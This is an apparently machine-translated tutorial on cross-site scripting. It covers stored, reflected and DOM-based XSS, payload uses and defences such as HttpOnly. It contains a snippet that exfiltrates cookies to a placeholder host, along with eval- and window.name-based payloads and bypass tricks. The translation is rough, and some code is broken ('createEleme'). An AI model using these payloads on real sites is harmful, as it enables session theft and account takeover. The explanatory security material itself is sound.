Cross Site Script, originally referred to as CSS, was changed to XSS to distinguish it from cascading style sheet CSS.

An XSS attack is an attack in which a hacker uses HTML injection to tamper with a page and insert malicious scripts to gain control of a user’s browser while he or she is browsing. For the various XSS generated by different scenarios, we need to treat them differently.

The types of XSS

Type stored XSS

  • summary:Type stored XSSData entered by the user is stored on the server side. This kind ofXSSWith strong stability, but also relatively wide impact, long duration, when accessing the normal URL will trigger, so also known asPersistence XSS;
  • Common scenarios: forums, store reviews and private messages, etc.
  • Practice the steps:
    • The front-end saves the input text to the back-end server;
    • The back-end of the request interface retrieves data from the database and returns it to the front-end;
    • The front end inserts content directly into the DOM;
    • Malicious code is running;
  • example:
    • Type in on a comment page for an item, save it on the server, and insert this code into the DOM to run when someone else is viewing the list of comments with an assignment using innerHTML.

Reflective XSS

  • summary:Reflective XSSIt simply reflects the user’s input back to the browser. Therefore, it is often necessary to induce users to click on a malicious link, thus raising the threshold of attack, also known asNon-persistent XSS; andReflective XSSBecause URL signatures are easier to defend against, many browsers have their ownXSSThe filter.
  • Common scenarios: website search, jump;
  • Practice the steps:
    • Attackers construct special urls to entice users to click;
    • Once the user clicks, the malicious code in the URL is taken out and spliced into HTML;
    • Malicious code may obtain the information of local users and send it to hackers or directly use the information of users to impersonate users for other behaviors;
  • example:
    • The original address washttps://sports.qq.com/, the attacker will trick you into clicking on a malicious link that he has stitched togetherhttps://sports.qq.com/#alert(1), (Directly spliced intohttps://sports.qq.com/alert(1)No, the site will have a filter that will alert the police) The site will not change, it is the same page, but the URL is changed, and then trigger malicious code such aseval(location.hash.substr(1)), will pop up the following concatenated code.

DOM Based XSS

  • summaryOf this typeXSSIn particular, it is not divided by whether the data is stored on the server side, if in effect it isReflective XSS. But because of the formation reason is more special. So it’s a separate category.By modifying the pageDOMNode-strokeXSSAnd call itDOM Based XSS.

XSS Payload

After successful XSS attacks, attackers often implant malicious scripts on the web pages that users are currently browsing to control users’ browsers through these scripts. These malicious scripts that perform specific functions are called XSS Payload. XSS Payload is actually a JavaScript script (or a Flash or other rich client script). So XSS Payload can do everything that JavaScript can do.

Cookie hijacked

A common way of attack is to hijack the user’s Cookie and then disguise the user’s behavior to attack. Local browsers often store encrypted personal information of users, so that they do not need to re-log in every time they enter the website. If cookies do not store local client information, an attacker who hijacks a user’s cookie does not need to know what data is in the cookie. Only need to take the Cookie this credential can pass in the corresponding website. It’s like an Anti-japanese drama where you can pass through enemy territory with a pass.

An attacker can load a malicious JavaScript file by inserting HTML with reflective XSS, which also avoids concatenating long JavaScript code into the URL, since many inputs are limited in length. Such as:

<xss.js>

let img = document.createEleme('img')
img.src = "http://www.xxxxxxxx.com/log?"+escape(document.cookie)
document.body.appendChild(img)
Copy the code
  • response:

    • Some sites bind cookies to the client’s IP address;

      • For example, introduce sohu interface file:<script src="http://pv.sohu.com/cityjson?ie=utf-8"></script>
      • Print the IP:document.write(returnCitySN["cip"])

    • Set the HttpOnly field to true to prevent JavaScript from reading Cookie information.

    • Update session IDS at regular intervals;

Construct GET and POST requests

Constructing a GET request is simple. Construct a URL that induces the user to click, such as https://juejin.cn?m=detele&id=12345678, and then run the following code to delete the article with id 12345678. (Of course, this is just an example, the specific request parameter is not necessarily this)

There are two ways to construct a POST request. One is to build a form and submit it automatically. If the form has too many parameters and you need to construct too many DOM nodes, you can write HTML code directly. Another option is to send a POST request via XMLHttpRequest.

XSS fishing

One feature of XSS attacks is that there is not much interaction with the user. Therefore, if you add a verification code when a user logs in, the XSS Payload will be invalid. In addition, the function of changing a user’s password will require the user to enter the old password. After all, attackers usually do not know your old password.

  • Verification code: An attacker can handle this situation by reading the page content, sending the URL of the captcha image to a remote server, and then returning the value of the captcha to the current serverXSS PayloadTo bypass the captcha.
  • Modify password: forge a fake login box, tricking users into entering a user name and password, the password sent to the hacker’s server.

Identifies the user’s browser

In many cases, attackers often need to collect users’ personal information accurately in order to obtain greater interests. Knowing what browser or operating system a user is using, for example, an attacker could execute a precise browser memory attack and eventually implant a Trojan horse into the user. XSS can quickly achieve the purpose of mobile phone information.

Although by getting the browsernavigator.userAgentObject can get the browser version and system information.   But the browser’suserAgentCan be forged, some browser extensions can mask or customize browser sentuserAgent. As shown below :(text for Google)

Therefore, the core of identifying the user’s browser is to judge the type and version of the browser by the characteristics of different browsers and the differences between different versions of the same browser.

XSS worm

XSS Worm attacks have greater impacts. Generally speaking, pages with stored XSS that interact with users are more vulnerable to XSS Worm attacks. For example, when a user leaves a message or sends a message to a large number of people, the page is a disaster zone. Users can send spam messages to each other crazily. Once you click on this address, it triggers a code in the XSS Payload. But pages like “profile Settings,” which no one else can access but you can see, have no dissemination capability even if XSS exists.

How is XSS constructed

Bypass length limit

The input is usually limited in length, and the original script is usually marked with a tag. It takes up a lot of length. There are two ways to get around the length constraint.

  • Using events
<input type=text value="var"> <script>alert(1)</script> Var =" onclick=alert(1)// <input type=text value=" onclick=alert(1)//"> <input type=text value=" onclick=alert(1)>Copy the code

But there’s a limit to how much code you can shorten with events, so it’s better to write the XSS Payload somewhere else and load that XSS Payload in a short code.

  • location.hash

One of the most common places to hide code is location.hash. Based on the HTTP protocol, the content of location.hash is not sent in the HTTP packet, so the content of location.hash is not recorded in the web log on the server side. The better to hide the hacker’s intentions.

Forge a XSS URL allows users to click on http://www.baidu.com/xss.html#alert (" XSS) location. The first character of the hash is #, so use substr (1) to remove the first character, When the user clicks input <input type=text value="" onclick="eval(location.hash.substr(1))">Copy the code

Location. hash itself has no length limit. However, the browser address bar is limited. If it is not long enough, you can use the method of loading remote JS files.

use<base>The label

The tag defines all hosting addresses for the current page using relative path tags.

<base href="https://gimg2.baidu.com"> <img SRC ="/image_search.png"> This is equivalent to <img src="https://gimg2.baidu.com/image_search.png">Copy the code

At this point, if there is a relative path in our code, once the attacker constructs the tag and inserts it into the code, the attacker can arbitrarily forge the path to display the image that the attacker wants to display.

<base href="https://xxxxxxx"> // Attacker built code <img SRC ="/image_search.png">Copy the code

window.name

There is no special character limit to assigning the window.name object to the current window. Window objects are browser forms, not document objects, so window objects are not restricted by the same origin policy in many cases. Attackers can use this feature to transfer values across domains and across pages. For example, assign A value to page A, then jump to page B and get window.name:

  • http://www.a.com/test.htmlpage
window.name = "alert(document.cookie)"
window.location = "http://www.b.com/test.html"
Copy the code
  • http://www.b.com/test.htmlpage
eval(name)
Copy the code

It also makes the code much shorter and gets around the length constraint.

XSS defenses

HttpOnly

The browser will prohibit the page’s JavaScript from accessing cookies with the HttpOnly attribute, which primarily addresses post-XSS Cookie hijacking attacks, not XSS.

HttpOnly is marked when the server returns a set-cookie header. You can add this attribute to any cookies you need. Sometimes JavaScript may be required to access cookies.

Input and output

Today’s popular front-end frameworks are automatically escaped, take vue.js for example

summary

The essence of XSS is still HTML injection, where the user’s data is executed as HTML code. The characteristics and application scenarios of different XSS attacks are different. To summarize,

  • Reflective XSS: Generally requires the attacker to trick the user into clicking on a URL containing XSS code, which is stored on the client side.

  • Storage TYPE XSS: users will be attacked when browsing normal pages, which is extremely hidden and has a wide range of influence and great risk. It is stored on the server side.

  • DOM Based XSS: It is not divided according to whether it is stored on the server side, from the effect of the reflection type XSS, the core is that it changes the DOM structure;

  • XSS Worm: Pages that users interact with are vulnerable to storage-based XSS attacks.

The content of this article mainly refers to Doug’s white Hat on Web Security.